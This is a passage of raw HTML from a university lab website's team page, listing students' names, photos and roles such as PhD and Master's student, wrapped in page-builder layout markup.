src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c73-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c74 position-relative\" data-colibri-id=\"182-c74\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c75-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c75 position-relative\" data-colibri-id=\"182-c75\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c76 position-relative h-element\" data-colibri-id=\"182-c76\">\n<div class=\"h-heading__outer style-611 style-local-182-c76\">\n<h4 class=\"\">Sundos Al Subhi</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c77 position-relative h-element\" data-colibri-id=\"182-c77\">\n<div class=\"\">\n\nPhD student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c78 position-relative h-element\" data-colibri-id=\"182-c78\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c79-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c79 position-relative\" data-colibri-id=\"182-c79\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c80 position-relative h-element\" data-colibri-id=\"182-c80\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-775 style-608-image style-local-182-c80-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c80-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c81 position-relative\" data-colibri-id=\"182-c81\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c82-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c82 position-relative\" data-colibri-id=\"182-c82\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c83 position-relative h-element\" data-colibri-id=\"182-c83\">\n<div class=\"h-heading__outer style-611 style-local-182-c83\">\n<h4 class=\"\">Sai Reshmanjali</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c84 position-relative h-element\" data-colibri-id=\"182-c84\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-614 style-local-182-c85 position-relative h-element\" data-colibri-id=\"182-c85\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c86-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c86 position-relative\" data-colibri-id=\"182-c86\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c87 position-relative h-element\" data-colibri-id=\"182-c87\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-776 style-608-image style-local-182-c87-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c87-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c88 position-relative\" data-colibri-id=\"182-c88\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c89-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c89 position-relative\" data-colibri-id=\"182-c89\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c90 position-relative h-element\" data-colibri-id=\"182-c90\">\n<div class=\"h-heading__outer style-611 style-local-182-c90\">\n<h4 class=\"\">Bhavya Busireddy</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c91 position-relative h-element\" data-colibri-id=\"182-c91\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-615 style-local-182-c92 position-relative h-element\" data-colibri-id=\"182-c92\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c93-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c93 position-relative\" data-colibri-id=\"182-c93\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c94 position-relative h-element\" data-colibri-id=\"182-c94\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-777 style-608-image style-local-182-c94-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-1.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c94-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c95 position-relative\" data-colibri-id=\"182-c95\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c96-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c96 position-relative\" data-colibri-id=\"182-c96\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c97 position-relative h-element\" data-colibri-id=\"182-c97\">\n<div class=\"h-heading__outer style-611 style-local-182-c97\">\n<h4 class=\"\">Sarah Akinol</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c98 position-relative h-element\" data-colibri-id=\"182-c98\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-616 style-local-182-c99 position-relative h-element\" data-colibri-id=\"182-c99\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c100-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c100 position-relative\" data-colibri-id=\"182-c100\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c101 position-relative h-element\" data-colibri-id=\"182-c101\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-838 style-608-image style-local-182-c101-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c101-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c102 position-relative\" data-colibri-id=\"182-c102\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c103-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c103 position-relative\" data-colibri-id=\"182-c103\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c104 position-relative h-element\" data-colibri-id=\"182-c104\">\n<div class=\"h-heading__outer style-611 style-local-182-c104\">\n<h4 class=\"\">Basit Damilare Amuda</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c105 position-relative h-element\" data-colibri-id=\"182-c105\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c106 position-relative h-element\" data-colibri-id=\"182-c106\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c107-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c107 position-relative\" data-colibri-id=\"182-c107\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c108 position-relative h-element\" data-colibri-id=\"182-c108\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-830 style-608-image style-local-182-c108-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c108-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c109 position-relative\" data-colibri-id=\"182-c109\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c110-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c110 position-relative\" data-colibri-id=\"182-c110\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c111 position-relative h-element\" data-colibri-id=\"182-c111\">\n<div class=\"h-heading__outer style-611 style-local-182-c111\">\n<h4 class=\"\">Brindal Dhol</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c112 position-relative h-element\" data-colibri-id=\"182-c112\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c113 position-relative h-element\" data-colibri-id=\"182-c113\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c114-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c114 position-relative\" data-colibri-id=\"182-c114\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c115 position-relative h-element\" data-colibri-id=\"182-c115\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-831 style-608-image style-local-182-c115-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c115-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c116 position-relative\" data-colibri-id=\"182-c116\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c117-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c117 position-relative\" data-colibri-id=\"182-c117\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c118 position-relative h-element\" data-colibri-id=\"182-c118\">\n<div class=\"h-heading__outer style-611 style-local-182-c118\">\n<h4 class=\"\">Vineeth Kumar Chandha</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c119 position-relative h-element\" data-colibri-id=\"182-c119\">\n<div class=\"\">\n\nMaster\'s student\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c120 position-relative h-element\" data-colibri-id=\"182-c120\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c121-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c121 position-relative\" data-colibri-id=\"182-c121\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c122 position-relative h-element\" data-colibri-id=\"182-c122\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-863 style-608-image style-local-182-c122-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c122-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c123 position-relative\" data-colibri-id=\"182-c123\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c124-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c124 position-relative\" data-colibri-id=\"182-c124\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c125 position-relative h-element\" data-colibri-id=\"182-c125\">\n<div class=\"h-heading__outer style-611 style-local-182-c125\">\n<h4 class=\"\">Ardavan Sassini</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c126 position-relative h-element\" data-colibri-id=\"182-c126\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c127 position-relative h-element\" data-colibri-id=\"182-c127\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c128-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c128 position-relative\" data-colibri-id=\"182-c128\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c129 position-relative h-element\" data-colibri-id=\"182-c129\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-884 style-608-image style-local-182-c129-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c129-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c130 position-relative\" data-colibri-id=\"182-c130\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c131-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c131 position-relative\" data-colibri-id=\"182-c131\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c132 position-relative h-element\" data-colibri-id=\"182-c132\">\n<div class=\"h-heading__outer style-611 style-local-182-c132\">\n<h4 class=\"\">Alex Asige</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c133 position-relative h-element\" data-colibri-id=\"182-c133\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c134 position-relative h-element\" data-colibri-id=\"182-c134\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Socicon (http://www.socicon.com)-->\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c135-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c135 position-relative\" data-colibri-id=\"182-c135\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c136 position-relative h-element\" data-colibri-id=\"182-c136\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-874 style-608-image style-local-182-c136-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c136-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c137 position-relative\" data-colibri-id=\"182-c137\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c138-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-610 style-local-182-c138 position-relative\" data-colibri-id=\"182-c138\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-611 style-local-182-c139 position-relative h-element\" data-colibri-id=\"182-c139\">\n<div class=\"h-heading__outer style-611 style-local-182-c139\">\n<h4 class=\"\">Angelique Willis</h4>\n</div>\n</div>\n<div class=\"h-text h-text-component style-612 style-local-182-c140 position-relative h-element\" data-colibri-id=\"182-c140\">\n<div class=\"\">\n\n<span style=\"font-weight: 400; font-size: 16px; font-family: \'Open Sans\'; color: #4055a9;\">Master\'s student</span>\n\n</div>\n</div>\n<div class=\"style-613 style-local-182-c141 position-relative h-element\" data-colibri-id=\"182-c141\">\n<div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n<div class=\"social-icon-container d-inline-flex\">\n<div class=\"icon-container h-social-icon h-global-transition\">\n<div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\"><!--Icon by Font Awesome (https://fontawesome.com)--></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-607-outer style-local-182-c142-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-607 style-local-182-c142 position-relative\" data-colibri-id=\"182-c142\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"d-block style-608 style-local-182-c143 position-relative h-element\" data-colibri-id=\"182-c143\">\n<div class=\"h-image__frame-container-outer\">\n<div class=\"h-image__frame-container\">\n\n<img class=\"wp-image-966 style-608-image style-local-182-c143-image\" src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" />\n<div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-608-frameImage style-local-182-c143-frameImage\"></div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-609 style-local-182-c144 position-relative\" data-colibri-id=\"182-c144\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-610-outer style-local-182-c145-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 